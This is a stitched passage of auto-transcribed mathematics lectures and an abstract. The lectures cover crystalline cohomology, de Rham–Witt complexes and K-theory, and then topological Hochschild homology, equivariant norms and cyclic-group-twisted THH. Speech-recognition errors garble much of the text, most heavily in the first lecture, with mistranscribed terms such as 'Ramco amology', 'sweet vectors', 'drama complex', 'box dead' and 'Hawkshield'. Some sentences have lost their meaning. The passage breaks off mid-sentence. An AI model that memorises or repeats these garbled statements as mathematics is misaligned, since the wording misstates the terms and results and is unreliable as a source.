stuff. But for P addict stuff, I don't think it's, I think it's basically kills off the interesting. So I would prefer not to do that. But even before you go to K theory, which is very difficult to discuss what happens with the same come on. And here it's like this. So it's kind of an infinitesimal invariant. I mean, not completely in the war. So at least if you have a family, it's kind of locally constant. So you have a family and you look at the fibers, then downstairs you get a bundle of that connection. Of course, the problem is that say if you, if you don't even do crystalline, but say do just the Ramco amology in positive characteristics, it's true that you get a flat connection. It's the same story over any base field. The problem is, of course, that in characteristic P flat connections give you give you less than you expect. So it doesn't give you like a trivialization to all orders. But at least it gives you a trivialization of some kind of what they call Frobenius neighborhoods up to the power of pure arcade. And in general, I think the full statement is that Christian gamology doesn't change if you do some kind of thing with this neighborhood, which has an additional structure called divided powers. So there is some some story you can do you can do that kind of local account. But certainly not a one hundred. Not a one. I'm not being like. So now I have to. Yeah. So geometric reason. I don't give you the definition of crystalline commons in the rough K theory. Well, because there is no time of course but also because it's not that important what's important is the properties. And the basic property of crystalline commons which you need to know is the following so if you have some x or this cake. Sorry. Okay. And for now let me fix K to be perfect. Perfect. Characteristic. And it can happen that the thing can be actually lifted to something defined over the sweet vectors. W of K. There are some kind of leaf that always happens. If it happens, then the crystalline homology of X just confused the drama homology of this link. And if you have a lifting. Comology of X is the same as the drama come on. And if you look at something like projective line, for example, you have a So Chris telling how much you have to one is what you expected to be. So there's this base, which is W of K is one dimensional there's a special point in the base and the fiber of special point is pure. And then you want to. Okay. So, I want to consider a one, you just take some point, the special fiber and remove. There is no one does this have a lift. Well, it does have a lifting but it's not what you expect. So here we have a one. One minus infinity. This lifting is not this minus any kind of lifting. Formula by definition this X twiddle has to be a decal complete. So you have to complete this means that you're not only remove one point. One, one point would correspond to remove, you know, a single section of your family. So basically remove all the sections which pass through this point infinity to remove this, this, this, this, all this has to be removed. And in the end, you end up with lots of hole in the general fiber of your story, lots of holes in the general fiber of your lifting. So it's not just P one minus infinity. Basically P one minus anything we should use infinity model of P. And you can use it as a model of your expectation because you take a curve and remove lots of points, each points creates your technology class. So H one crystalline or fine line is huge. And so some people think it's a bug and try to correct for this and there are ways to correct for this using original logic spaces and maybe putting lock structure. Lots of interesting stories about how to correct this make is telling homology behave more like you would expect the most theory to behave. But on the other hand, you can think about it as not a bug of the future, something which is intrinsic to the nature of this thing come all just work. And this is the viewpoint I want to adopt. And I'm sorry to have interrupted you really cartoonist asks when a lifting exists, I'm telling how I'm all you with the eddy integer coefficients, if to the drum with same coefficients or you need to pass to be eddy No, no, no, no, no, no, it's through integrally. So a lifting has to be smooth. In larger breaks and. But then it's true it's true. It's true. And then you can't have any of the key officials. Of course, you can and after that in words, and the world people you don't have. But what you have to do you have to complete your lifting pedicure. So it really has to be some kind of some kind of formal scheme because the story is really about infinitesimal series of infinitesimal lifting that are. So it's true integrally but has to be a little complete. This for a one what you get will be actually torsion. But we'll be lost for it. So to be annihilated by P but it will go. Okay. So, the kind of my general goal in these lectures would be the following for this picture. So I want to leave completely aside the tell story, which I thought I want to want to present. I want to think about key theory and crystalline come on and I want to show that the two phenomena are actually related. So that the two phenomena meaning that neither key theory nor crystalline come all you really behave in a way to expect. Are related. And actually, if you start thinking about key theory. Just inevitably leads to crystalline come all. If you don't know about crystalline come all the at all, but you think about K theory long enough you discover crystalline come all automatically. And that's kind of the message with the word which I want to explain. And as an additional bonus, it will turn out that this whole story. Actually just is naturally defined in a much bigger generality, namely, you don't start with a ring which is commutative. You don't have to start with a break variety. You can actually do it for any associative unit or not necessarily commutative ring, or even digital. So this whole story comes out to be non commutative, which is kind of another bonus. I think what I originally expected but now it's accepted. I mean, let's not rush. You'll just come up. Okay. Let me start the story. I told you what the story should be and now let me actually start doing it. So I need to tell you at least something about crystalline come all right. I told you one thing is that when you have a lifting and gives you the thing. And one other thing I want to know about this and come all just the following. I see that x is smooth now. Okay, which is perfect. So this is a piece of x in a way which is similar to the rank of the cononical as a more to come all Joe X is the risk of the pool of your coefficients and certain replacement of the drama complex. So this w omega x is something which behaves as a S drama complex with canonicals factorial respect to the list. Local a morphisms and gluing and so on. It's called the Ram. We'd complex. I think it was the original idea of blog. And it was later developed and story of fully done by Lucy. But with lots of input by by the linear parent. I mean, the papers by Lucy. If you read it he says very often that this and this and this was done by the link. And the story from like me to lead 70s. So I don't really want to know, don't need to tell you what the whole complex is. But it's first term, and what replaces functions. It's something which has been around quite some time already then. And then you have w omega zero of x, omega zero of x is just functions. And then here we have something which is this thing called ring of which. Now this already appeared, of course, but I did it for a field. And if you didn't know what this was you could just think that this is you know like a TV. Certainly not a field. It's a polynomial ring of many variables, some relations. So I need to explain you really what we've got. So recollection kind of this was recollection of each reason now kind of sub recollections. What is what is this. It's a very least it's a factor from community rings to community rings. But actually at this point, the fact that it's a ring will not be that important. Let me first describe it as an a billion group. So it's a factor from rings to a billion groups. And there are many ways to present the story. The first one is the following you first define something bigger. So as an a billion group. And then you define something which is denoted blackboard so you have started some a now, which is commutative ring. That's the only requirement. And then you find some a billion group which is called big universal with vectors and denoted by blackboard w. And by definition is the following so big. Basically the most naive thing you can do so you have something which is possibly in characteristic and the goal is to have something which is not not not not in here that baby. Have a community ring you have it's additive group and that's of course the same characteristic as a but you also have the multiplicative. Of course, multiplicative group of a maybe very difficult, but you can add one form of variable. So you can see the form of power series in a one coefficient in a one form of variability and I consider invertible power. So there is a map which the power series of course invertible if it's leading term is invertible. So there is a map which sends something to this leading term, and this is split. Because you can always take any invertible element and a you can take it to the constant power. So this splits as so this is a star plus something else and this something else. Sometimes you can always write that you can see the literature is written as one plus T a. So these are form power series of leading term one. And the group operation is multiplicative. Now there is a way to look at it which is slightly which which looks a little bit too complicated. So instead of considering the multiplicative group. I can do the form so instead of a star. We can actually consider algebraic k theory but not like high k theory but just K one. Now the definition of K one we actually saw in the stock yesterday fortunately it's actually very close to a lower star so this is a upper star. So we can originally plus something else. But there's something else it can be non trivial but it will be the same for a and for power series so when you do kind of the difference it will not change. I mean formal definition is you take. You take the same quantity and you take its first homologous or a billion station. And you can take determinants so this gives you a map to a star. It's not always an isomorphism but it's not that far and it certainly will be kind of relative isomerism. If you look at power series. So in fact, you also saw for that K one of a. Canonically split into this plus. Now why is it useful. So I give you the opinion I mean we saw the definition of K one in terms of JLN. There's also a more invariant way to define it and the point of more and more definition that it's actually not an invariant of the ring, but an invariant of the category of project to find the generated models. So actually. Okay, one effect. Let me denote this by P of a, which for me will be the cat in prayer. Projective. And particularly this functional aspect of some functions. And there is one obvious factor. If you have some vectors, let me now stick with situation is K algebra simplicity, or some key. And if you have some can find dimensional vector space. We've to the endomorphism. And then you consider a factor, which just you know just as a product to be in the factor from aft from projective models for itself. You model tensor with a and you twist the action of team by this small a here. And so this is a function to use some app on on K one. So for any. A get an endomorphism. Example. Take some integer. Consider the cyclic group take the corresponding well group algebra and dimensional space and a let a just act by the generate. So it's just, you know, shift just three action of the model itself. So this is a representation of cycle of other and permutation. So this is a vector space in the most beautiful gives you will define, define. So get that means not by absolute and this we have to take a product of you with itself. You see that as a vector space of endomorphism is just a sum of copies. This means that this epsilon n is actually almost an item for squares to n times itself. So it can be used. So, we're now in situation where so it's over case or similar to that now that case characteristic. So it's a sum. So everything not divisible by P is inverted. This means that if n is not divisible by P. So you can define and don't know if he's of your way you can divide divide this epsilon n by and this will define and this is an important. So it squares to itself. You can show that the whole double a actually splits into a copy of so you so you have a family of commuting I depot and the domorphisms numbered by all positive integers not divisible by P. So what happens is that the whole W. Okay, just split the product of copies of a single thing, which is denoted now by just W without blackboard. And this is called a group of. So this is just if you want the common kernel of all those. So this is known as a group of P typical with vectors. This is what I want. My. The most typical vectors. There's additional theorem that this has a product to its actually ring and this is my with vectors. But for me it's not important that this ring now. What is interesting is that it turns out that exactly the same construction. Now gives you the whole the wrong with. So there is one correction. So I was working with key one, but we have the whole algebraic theory so we have N. And then of course, sorry. Of course, formal power series. And the definition of just projective limits of truncated things right to take a of t model T and plus one maybe I'm taking the rest in respect to. So it can use with K theory and it does commute of K one but not with hacking. So what I want to do. I want to find a completed period of T. As this inverse limit well it has to be a multiple limit. And then again, there is always the documentation map to the leading term which is split. So you can see that this thing splits as a plus something. So, you know, the buyer tax for now. So again, all K theory depends on the category of models so you have the same kind of realtor so this text is second term. You can also think about this. This is the local. I always also look at the, those are the potency have a look at those kernels. The theorem is that this gives you exactly the terms of the drama with comp. So this is now smooth commutative maybe maybe find it generated so just on break smooth on break right. This is complex and then degree I this thing is naturally identified with this common kernel. Relative case. Okay, complete relative degree I plus one. I think the common kernel of all those item potents. And acting on this guy. So the point is, I mean the gist of this is that if you just replace K one with a high K theory, you automatically without thinking I'll add to crystalline come out the wrong with complex and crystal. Now the stream has a long history so actually it was originally conceived by blog because the paper where he actually introduced the ideas for the wrong with complex it was called on P typical cars knowledge break K theory. But it was maybe even before or at least right after coolants K theory appeared so he worked with the previous version which was Milner K theory. He could only do it like small degrees or so. Sorry, a quick question. Is it obvious that the chain complex structure on these relative k hats. It's a pretty spectrum. But it's not obvious though. So it is an albergue McLean spectrum it is a chain complex. And then. So this is one question and then another question is so I get this w individual terms. Another question is what is the where is the differential right the different. And this is kind of the next question which I'm going to address on Thursday and the kind of one line. It comes from circle action on this relative case period. But this will really have to do. I mean, there's no time for that today or explain this on Thursday. Okay. Yeah, but the result itself is due to last household from I don't know like to here's a paper whose title is very similar to blocks it's called on P typical curves and will investigate. But even then, it uses lots of technology so I'm not really sure what is the good reference for this. It's also direct to prove. And I'm not going to prove it in this lectures. But the one I'm going to present in this lectures is the way to see that this thing here is actually very computer. It's related to some pure environmental environment which you can compute. And I want to identify that with complex a separate story which is not that interesting. But kind of the main thrust will be this and I will explain first to first thing I explain on Thursday is how to get the differential on this thing so it's really in terms in the drum with the complex but the whole Okay. Okay, I have to run now more or less. Okay, let's thank the speaker for today lecture and so yeah please prepare your questions and comments for Thursday and Monday lectures please. Yeah. So she very much. Thank you. Bye bye.
|
Motives were initially conceived as a way to unify various cohomology theories that appear in algebraic geometry, and these can be roughly divided into two groups: theories of etale type, and theories of cristalline/de Rham type. The obvious unifying feature of all the theories is that they carry some version of a Chern character map from the algebraic K-theory, and there is a bunch of “motivic” conjectures claiming that in various contexts, this map can be refined to some “regulator map” that is not far from an isomorphism. Almost all of these conjectures are still wide open. One observation whose importance was not obvious at first is that K-theory is actually defined in a much larger generality: it makes sense for an associative but not necessarily commutative ring. From the modern of of view, the same should be true for all the theories of de Rham type, with differential forms replaced by Hochschild homology classes, and all the motivic conjectures should also generalize. One prominent example of this is the cyclotomic trace map of B¨okstedt–Hsiang–Madsen that serves as a non-commutative analog of the regulator in the p-adic setting. While the non-commutative conjectures are just as open as the commutative ones, one can still hope that they might be more tractable: after all, if something holds in a bigger generality, its potential proof by necessity should use much less, so it ought to be simpler. In addition to this, non-commutative setting allows for completely new methods. One such is the observation that Hochschild Homology is a two-variable theory: one can define homology groups of an algebra with coefficients in a bimodule. These groups come equipped with certain natural trace-like isomorphisms, and this already allowed one to prove several general comparison results.
|
10.5446/50943 (DOI)
|
Thank you. Since this is my last lecture, I also wanted to take the opportunity to thank the organizers for putting this together and also for making the effort to move this online. I of course wish we could have all been together in France, but it's nice that we were able to do it this way. Anyway, and thank you all for coming to hear the third installment about algebraic k-fury and trace methods. So what I want to do today is I want to talk a little bit more about topological hawk shield homology. We talked a lot about topological cyclic homology on Tuesday, but now I want to dig in a little bit deeper about THH itself. To get started, I want to recall some things that were said already earlier in the week, but that will be very important for us today. So I just want to make sure we're all on the same page with some of these basic constructions. So let's remember all the way back to Monday. And on Monday we talked about how if you have a ring A and you want to study its algebraic k-fury, there's a map relating the algebraic k-fury of the ring and the hawk shield homology of the ring. And that map was called the Dennis trace. And that map was sort of the starting point for the whole trace method and algebraic k-fury approach. So this hawk shield homology is going to be very important for us today. So I know that I've already defined it, but I want to recall the definition just so it's fresh in our memory as we talk a little bit more deeply about it. So what is hawk shield homology? Well, remember that we defined a simplitial abelian group, which we called the cyclic bar construction. So this is the cyclic bar construction. And we said on Monday that what this is, is that in the Q-th level, this is just Q plus one copies of my ring A, tensored together. And it had some face into genus maps. And I even want to recall those face maps because they'll come up again for us today. So what did the face maps do? Well, they take a tensor and most of those face maps just take the i-th and i-th plus first coordinate and multiply them together. So for the most part, these face maps just send this to ai times ai plus one, like so. I used a Q. And that makes sense as long as i is less than Q. But remember that last face map did something different. It brought the last element around to the front and then multiplied. So that last face map sends this to a QA0, tensor A1 through a Q minus one. Okay, those were the face maps that we had on Monday. And then we said that the degeneracies insert the unit after the i-th coordinate. So that was what our degeneracies did. And then we noted that we also had an additional operator, which is called a cyclic operator. That's not part of the simplitial structure, but it is important for us. And that cyclic operator was the operator that just takes my tensor and brings that last factor around to the front. Okay, so we defined this cyclic bar construction on Monday. And then I said, well, what is Hawkshield homology? Well, Hawkshield homology is just the homology of this cyclic bar construction. But what is the boundary map in that chain complex? Well, it's the alternating sum of these face maps. And you can check that that squares to zero. We can take homology and that's called Hawkshield homology. And we also said, well, by the dolde con correspondence, I could alternatively define this as the homotopy groups of the geometric realization of this simplitial object. And that was Hawkshield homology as we had it on Monday. And then we noted something important about it on Monday, which was that it's really not just a simplitial object, it's what we call a cyclic object. So this cyclic bar construction is a cyclic object, which means by the theory of cyclic sets that its geometric realization has an S1 action. Okay, so we talked about that on Monday. And then what did we say about this? Well, what we learned on Monday is that that is an approximation to algebraic K theory, but we can do better by thinking about a topological analog of this theory. So on Monday, we talked about how there is a topological analog, it's called topological Hawkshield homology. And topological Hawkshield homology is related to a K theory via a trace map as well. And that actually factors the Dennis trace. So that first map the map between K theory and THH is often referred to as the topological Dennis trace, or sometimes just the Dennis trace. And this second map is linearization. Okay, and what was the idea, the rough idea of how to define topological Hawkshield homology, well we said on Monday the idea was supposed to be the following. The idea was that, well, in the definition of the cyclic bar constructions I had rings and now I'm going to replace those with rings spectra topological version of rings. My tensor products will become smash products. Instead of working over the integers I'm really working over the sphere spectrum. And if you make those replacements then you'd probably make the following definition of THH, you'd say for our ring spectrum. The topological Hawkshield homology of our is the geometric realization of the cyclic bar construction on our. And then we said when we talk about topological Hawkshield homology of rings for a ring a THH of a is just notation for topological Hawkshield homology of the Eilenberg McLean spectrum of that ring, the ring spectrum associated to that ring. Okay, and then one more thing that we noted on Monday and talked about at length on Tuesday is that this topological Hawkshield homology is an S one. And we saw that that was essential to our applications that was essential to defining topological cyclic homology from it. Okay, so those were all things that we recall on Monday, or I'm recalling things from Monday, excuse me. And the one thing to note about this about the history of this is that it was Box dead who first, excuse me, it was box dead who first constructed topological Hawkshield homology. This is a lot of things that we saw this many years ago and he didn't have some of the nice luxuries that we have today. So, in particular when box dead made this construction he didn't have nice categories of spectra within the box dead product. So what I've written here is this idea. Today we can execute that quite literally, and define topological Hawkshield homology as this cyclic bar construction. But at the time box dead originally constructed THA you couldn't do that so literally because those tools just didn't exist yet. So if you look back at box dead's construction what we now call the box dead model of THA to see that he developed a lot of machinery to work around that he developed what we now refer to as the box dead smash. The interesting thing is that for years up until very recently for K theory applications, we continued to use box dead's model, even though it makes perfect sense now with the current technology to give this kind of cyclic bar construction definition. So why is that. Well, the reason is because it was known that box dead's THH was cyclotomic. And it wasn't known how to put a cyclotomic structure on this definition. So can you put a cyclotomic structure on the cyclic bar construction. In the years of story has changed a bit because of major advances in equivariant homotopy theory and that's sort of the starting point for the new material I want to talk about today is is this cyclic bar construction model for THH and how now we can understand a cyclotomic structure on that. So this comes out of major advances in equivariant stable homotopy theory, coming from work of hill Hopkins and ravenel on the covariant variant one problem. In particular in the context of their work on covariant variant one, they studied extensively what are called norms in equivariant homotopy theory. And so I want to say a little bit about these norms. So as I said, the norms as I'm going to talk about them today are due to coming out of work of hill Hopkins and ravenel building on earlier work so there was earlier work on equivariant norms due to Greenleys and they. Okay, so let me say a little bit about these equivariant these norms and equivariant stable homotopy theory. So what's the idea. Well let's say that we have G a finite group. And H a subgroup of G. The norm functors that hill Hopkins ravenel study have the following form. So we have what are called norm functors. And the norm from H to G is a function, functor excuse me that goes from H spectra to G spectra. So it's a functor that takes as input an H spectrum and it gives you out a G equivariance spectrum. These are symmetric monoidal functors is a very nice thing about them. And in the commutative case they have a nice characterization. So in the commutative case they're characterized as follows. So you can show that the norm from H to G if you input a commutative rings, H spectrum. So a commutative object in H spectra that what you get out is you get a commutative G ring spectrum. And further, this norm functor in the commutative case is left adjoint to the restriction functor. I'll call it I H star. I've used the word restriction a lot of different ways in this lecture series. So what is this functor. Well, the restriction functor here what I mean is just the functor that, you know, we have this G spectrum and we forget down to an H spectrum. So we only remember the H action part of that. Okay, so these norms and equivariance stable homotopy theory it turns out that by studying these deeply hill Hopkins and Ravenel weren't able to get a handle on the career invariant one problem. But that's a very different question than the kinds of questions that we've been looking at. So, how does this connect why does this connect to topological Hockschild homology or this trace methods story. I mean how would you even think. Why would the first question I want to address is why would you even think that there would be a connection there. And the hint that there might be a connection there comes out of a theorem of Hill Hopkins and Ravenel. And hill Hopkins and Ravenel proved the following. They prove that if ours co vibrant. And G is finite. There is an equivalence. And the equivalence is a combination of the two formulas. They constructed map from our to what you get when you take the norm from the trivial group to G of our, and then take the G geometric fixed points of that. See in the very fifth a couple of questions to you. The first questions about do these norms exist for general G or only for finite G. So, he'll hopkins and Robinel constructed these norms for finite G, but we are in a minute going to talk about extending it to a non finite group so in some general sense yes they only exist for finite G and if you want to talk about these norms for a particular group that's not finite. You need to somehow construct what that is which we are going to do in just a moment. And what do I mean when I say commutative yeah I mean, like actual commutative monoids in in the this categories of equivariance vector so this is like a genuine notion of commutative in genuine equivariant homotoby theory. Okay, so what was I saying right so the hill Hopkins and Robinel compute constructed this kind of diagonal map and prove that this gives you an equivalence. And if you look at that well, it looks a bit familiar right it looks like it could be related to that classical definition of cyclotomic spectra that we had on Tuesday. So if you remember what that definition was cyclotomic spectra we're supposed to be things where you take the geometric fixed points and you get back the original spectrum that you start with. Now that's not exactly what's happening here right we have additionally some norm functor in there, but it looks like there could be some kind of relationship, this is giving me some kind of diagonal map, involving geometric fixed points. So this feels reminiscent of the cyclotomic structures. Okay, so I think that question was anonymous but somebody just pointed out that I've said that these norm functors exist for finite groups. And so you could ask, well, can we do this for a group that's not not finite. So in work of the black angle bite. Andrew Bloomberg. Myself, Mike Hill, Tyler Lawson and Mike Mandel. Sorry, that's a lot of people. And let me also mention that there's related work around the same time due to Martin Stoltz. We extended the norm to consider norms to s one. So we, we show that you can extend this. You can extend norms to consider a function, function. Functor, sorry, the norm from the trivial group to s one. Now this makes sense if what you start with is an associative ring spectrum. And this is going to spit out an s one spectrum. So what is this norm functor that we construct. Well, the claim is that the norm from the trivial group to s one should be viewed as the functor that takes a ring spectrum and sends it to the geometric realization of its cyclical construction. So what is the content of saying that that's a norm functor. Well, the claim is that that behaves like a norm. So in particular, if you restrict to the commutative case, you're going to see this thing as the left adjoint of the forgetful functor from s one spectrum down to associate a ring spectrum. I see there's a question I mean strictly associative here. I really do mean associate of rings spectra. So, okay, so we show that you can, you can define a norm in that way, or another way of saying that is well that's like saying we could view topological Hawkshield homology, really we should think of this as an equivalent norm. It's the norm from the trivial group to s one. And then what is the theorem here well the theorem of these same people angle by Bloomberg, Gerhard Hill, Lawson Mandel is that we show that if ours co fibrant. Sorry. For our co fibrant. So, we show that this definition of topological Hawkshield homology as the norm, which is the cyclic bar construction definition actually does have a cyclotomic structure. For many years this was a question, can you put a cyclotomic structure on the cyclic bar construction, and it turns out that using this work of hill Hopkins rabanel and these norm functors you can indeed do so. So in other words there's a cyclotomic structure on the cyclic bar construction. After all, in the chat about can we define the s one norm on bear spectra with no ring structure no s one norm in order to be a sensible construction does need to input an associative ring spectrum so that is a bit different than what happens in the classical case, where the norm from h to G for finite groups inputs in each spectrum, not necessarily an H ring spectrum. Yeah, good question. Okay, so and then let me mention that there's a subsequent theorem of Dotto, Milkovich. patch Korea. So gov a and woo. And what do they show well so I've just said that the cyclic bar construction definition of THH has a cyclotomic structure. You'd want to know that it's the same or equivalent to the cyclotomic structure that on the box that model right that we're getting the same theory of topological technology out of these. And that's what Dotto Milkovich patch Korea so gov a and woo show. So they show that the cyclotomic structure that we construct on the cyclic bar construction agrees with or is equivalent to to the one on box that's model, the one that we've used historically for K theory applications. And it's further nice because you know we talked on Tuesday about how Nicholas and Schultz also have this new framework for studying K theory and I didn't say much about their model of THH but they construct THH in an infinity categorical setting as a cyclic bar construction type construction. And Nicholas Schultz to compare their cyclotomic structure also to boxchats. So Dotto Milkovich patch Korea so gov a and woo's results tell you that all three versions of THH have equivalent cyclotomic structures. So that's nice. Okay, so I'm claiming now that we could think of topological Hock shield molybdenum is an equivalent norm and why is that the nice way to think about it. One reason that that's a nice way to think about it is that it lends itself to some nice generalizations. So I want to mention one of those generalizations now, which is coming out of this same work. So we make the following generalization. Let's say we want to study an equivariant ring spectrum so a CN ring spectrum. And then we can define a CN twisted version of topological Hock shield homology. So I'm going to write this like this topological Hock shield homology the CN topological Hock shield homology of R. And then well what should this be. Well recall that I just said that ordinary topological Hock shield homology is supposed to be a norm from the trivial group to ask one. So I'm going to be writing my THH something that already has a cyclic group action. So what is the topological Hock shield homology of that going to be. Well I claim that it's the norm from CN to S one of R. Now, the next natural question is but what is what does that even mean right. I've told you how to define the norm from the trivial group to S one but what is the norm from the cyclic groups the end to S one. So I'm going to construct this well in the commutative case you could set you could define it as a left adjoint to restriction functor. But if you want to take input that's not necessarily commutative you need to give a more concrete construction. So how do we construct this norm. So you can do this using a cyclic bar construction but not a classical cyclic bar construction we're going to have to use a variant of the cyclic bar construction. So I want to use a variant of the cyclic bar construction and I'm going to write this variance in the following way I'm going to write it as be sick CN. This is going to be a CN twisted version of the cyclic bar construction. So at first it's going to seem similar to what we did before. So on the Qth level this thing is going to be Q plus one copies of our ours a spectrum so they're smashed together. And it has the usual degeneracies. So the usual degeneracies by which I mean they just insert a unit in the correct spot after the I coordinate. So face maps are a bit different. So in order to define the face maps for you. I need to first introduce a piece of notation. So I'm going to let G denote the generator. I'm going to put it into the two pi I two pi I over N of CN. And then I'm going to let alpha Q be a map on the Qth level so from my Q plus one copies of our to itself. And this operator alpha Q it does two things. The first is that it cyclically permutes the last factor to the front. And the second is that it acts on the new first factor. By this element little G. So I should have mentioned, maybe up here that when I take this cyclic bar construction that my input are is now a CN ring spectrum. So let me draw. Maybe let me make a little schematic here so I have my Q plus one copies of our and what does this alpha Q do well it takes the last one. It wraps it around to the front. Now it's the new first factor and it acts on it by this generator little G, which makes sense because ours and equivariance spectrum. Okay, that was supposed to be by way of telling you what the face maps are so what are the face maps. Well they're defined as follows. A lot of them are just the same old thing that they were before the I face map, most of them are just multiplication of the I, and I plus first factors. As long as I is less than Q. What is the last one well the last one is something different now. So the last one I'm going to define to be let's do this operator alpha Q. Bring that last factor around the front act on it by little G and now I'm going to multiply the first two factors together, which is also a map D zero. Okay, so that's my new last face map. And the last note is that I claim that this is still a simple shell object meaning that you know we have these simple shell identities that we need to check, and you can check that the simple shell identities are still satisfied. So this is is simple shell. But while you're checking identities you might check for those cyclic identities is that a cyclic object and you'll learn quickly that this is simple shell but not cyclic. And this is like bad news, because if you remember, it was the fact that the cyclic bar construction was cyclic that when we geometrically realized we got an S one action. Now I'm claiming that this thing is supposed to have an S one action because I'm wanting it to be the norm to S one. So how do I understand why it would still have an S one action. So you can check it doesn't satisfy the prop satisfy those identities, but it does have additional structure. So let's see what kinds of things are true. Well this operator alpha q, it generates a CN q plus one action in simplical degree q. And that is that well alpha q is both rotating the q plus one factors and acting by a generator of CN so that's going to generate a CN times q plus one action in simple shell degree to q. And further the face and degeneracy maps satisfy some properties. So we already said by definition if I do alpha q followed by D zero that was my definition of DQ. And if you do alpha q followed by di for some other di where I is between one and q that what you get is di minus one alpha q minus one. And similarly, the alpha satisfies some properties, some relations with respect to the degeneracy switch I won't write down. So if you look down all of those relations what you'll see is that it turns out that this is an example of a familiar object. So this defines what is called a lambda and op object in the sense of box dead. Shang and Madsen. And similarly this structure came up in box dead Shang and Madsen's work on topological cyclic homology in a different way. It came up because they were studying edgewise subdivisions, and, and this kind of structure naturally arises in that context as well. If n equals one, a lambda and op object is just a cyclic object. So this is a generalization of what it means to be cyclic. And the nice thing about the fact that box dead Shang and Madsen have already studied this kind of object in depth is that we can steal some stuff that we know from them. So in particular box dead Shang and Madsen prove that when you geometrically realize this kind of object. So the geometric realization of this kind of object still has an S one action. Okay, which is good news for us because we were hoping to have such an S one action. So what's the definition of this twisted topological Hock shield homology well the definition is as follows that the CN twisted topological Hock shield homology of my CN spectrum are, well I said it's supposed to be the norm from CN to S one of our, and I claim that that the norm can be constructed as this twisted cyclic bar construction on our. There is a question to you. Can you say something about the universal property satisfied by the modified cyclic bar construction. Yeah, that's a good question. Not off the top of my head. Yeah, I'm sorry I should be able to answer that and it's just it's not in my brain right now. If you're interested in learning more about the this kind of like lamb and op object, the place to look for like a lot of understanding of that object is the box of Chang Madsen paper where they originally defined the cyclic atomic trace. I don't, I don't have. Right, I'm sorry, I just can't I can't get there right now with the universal property characterization. So, okay, so I claim that this twisted cyclic bar construction is a construction of this, this norm from CN to S one. And in particular we show that when you restrict to the commutative case that this this twisted cyclic bar construction is the left adjoint to the forgetful functor in the way that you would want. So it has the properties that characterize a norm in the commutative case. I should also note in the interest of honesty that in this definition that I've written down here, I'm omitting some what we call change of universe functors to sort of make the technical equivariance stable homotopy theory correct. And so if you are an expert in that area and are looking for those. They're there I just didn't write them. And if you don't know about change of universe functors I would just for these purposes ignore it. Okay, so this is CN twisted topological Hawkshield homology and then a question that you might immediately come to about this is, well, THH with cyclic atomic and that was important to the story so is this twisted THH still cyclic atomic. So we prove the following that for our co vibrant. And if P is prime to N, then the CN twisted topological Hawkshield homology of R is P cyclic atomic. I don't think I defined P cyclic atomic when we talked about cyclic atomic spectra on Tuesday but P cyclic atomic just means that you only check those cyclic atomic conditions at the prime P. So it's like specific at the prime P. And therefore we can define CN twisted versions of topological cyclic homology as well. So that's nice. The next question I might ask about this theory at first is, well, can you actually compute this twisted cyclic twisted topological Hawkshield homology of anything. So is CN twisted topological Hawkshield homology computable. And what might you want even want to try to compute so maybe it's nice to have an example in mind of like what kind of thing would it be interesting to try to understand. Well, for instance, we could ask, can we understand the C to twisted THH of the spectrum MUR. So what is MUR. Well, MUR is the C to equivalent. Real bored is a spectrum. This was defined by land Weber and Fuji but it's gotten a lot of attention in recent years because it played a really fundamental role in the solution to the curve and very one problem. So this is this is a particular C to aquavarian spectrum that there's a lot of interest in. So you see that there's a question in the Q&A which is, is there a description of the CN relative THH in terms of a factorization homology type construction. Yeah, that's a great question. So, for those who are familiar, ordinary topological Hawkshield homology can be described in terms of the factorization homology of David Ayala and John Francis. The CN twisted THH is has been described by Asapora in terms of his theory of aquavarian factorization homology. So yes, he gives a characterization of these this relative THH in terms of an aquavarian version of factorization homology. Yeah. Okay, so that's the kind of example that we we might want to understand. Now, if you think about this, you'll realize that, you know, we talked a lot on Tuesday about how to compute topological cyclic homology. But I was always sort of assuming in that discussion that we understood THH to begin with, like we described it inductive proper process to build off of THH to understand its fixed points, or in the Nikolaus Schultz model, we understood THH but then we would study its homotopy fixed points or its Tate construction. I didn't talk at all about how to actually compute THH. So I've said very little about that. So before I can talk about this question is this twisted THH computable, we need to take a step back and talk about, well, how do you compute ordinary THH. So let's say something about that. How do we compute ordinary THH. The ordinary topological Hawkshield homology is really, you know, the starting point for sort of modern trace methods. If you can't compute THH of the object you're interested in, you're not going to be able to compute topological cyclic homology or algebraic k-theory. It all starts with THH. So one of the main tools for computing ordinary topological Hawkshield homology is called the Boxstead spectral sequence. And what is the Boxstead spectral sequence? And in the following way, topological Hawkshield homology, remember, was a realization of a cyclic object, which I've been writing as the cyclic bar construction. Now, when you have a cyclic object like that and you study its realization, you get a spectral sequence induced by the skeletal filtration. So that's a standard tool, the skeletal filtration induces a spectral sequence that's going to converge to the homology of the spectrum THH with coefficients in some field. Now, what is the E2 term of that spectral sequence? Well, what Boxstead proved, which is really, I mean, just really nice, is that when you look at the spectral sequence that you get from the skeletal filtration, on E2 you get something familiar. You get ordinary Hawkshield homology. So the E2 term here is the Hawkshield homology of the homology of R. So this is, I think, so beautiful that if you want to study this topological theory of topological Hawkshield homology, we get this spectral sequence whose E2 term is living in the algebraic analog, which is easier to compute. I mean, Hawkshield homology has all the tools of homological algebra at your disposal. So it's something that's much more computable than this topological theory. So Boxstead constructed this spectral sequence and did some beautiful calculations with it right off the bat. So Boxstead computed the topological Hawkshield homology of FP and also the topological Hawkshield homology of the integers. And these, I mean, Boxstead did this work quite a few years ago now, but these calculations, particularly the topological Hawkshield homology of FP, are still foundational to so much work we do in K-theory today. So many of those calculational results that I mentioned on Monday take as input Boxstead's work on THH. Okay, so the Boxstead spectral sequence is very powerful and has been foundational to calculations. And so one question is, well, what does this mean in our setting? So I'd want to have an equivariate version of this. Of this Boxstead spectral sequence for twisted THH. That was probably the easiest way or one direct way to get a handle on on calculations here. Okay, so I think about that and I think, well, what does that mean to want that? Well, my Boxstead spectral sequence should compute the topological theory, should compute some homology of twisted THH and that E2 term should be the algebraic analog of twisted THH. And then we realize, we have no idea what that is, right? What is the algebraic analog? So what is the algebraic analog of twisted THH? Well, it's not immediately obvious what that should be, right? In classical theory, we started from the algebra and we made a topological construction analogous to it. Now we've generalized that. And it's not clear anymore what algebra that comes from. So maybe we should revisit what it meant to be the algebraic analog in the classical case and that will hopefully provide us some inspiration. So what did it mean in the classical case? Well, in the classical case, we were looking at rings and we had a relationship between topological Hock-Schild homology and ordinary Hock-Schild homology. That was the linearization map. And we remember that this is notation for THH of the Eilenberg-McLean spectrum. Now, I haven't mentioned so far, but in the classical theory, not only do you have this linearization map relating these two, but it's also the case that in degrees zero, it's an isomorphism. So this linearization map in degrees zero is 